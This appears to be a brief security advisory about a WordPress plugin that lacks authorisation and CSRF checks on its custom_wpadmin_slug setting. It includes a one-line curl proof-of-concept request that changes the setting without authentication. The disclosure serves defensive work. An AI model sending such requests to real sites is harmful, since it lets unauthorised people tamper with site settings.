The plugin does not have authorisation and CSRF checks in place when updating the custom_wpadmin_slug settings, allowing unauthenticated attackers to update it with a crafted request
curl -X POST --data "custom_wpadmin_slug=attacker-value" https://example.com/wp-admin/admin-post.php
Settings is displayed in Settings > Permalinks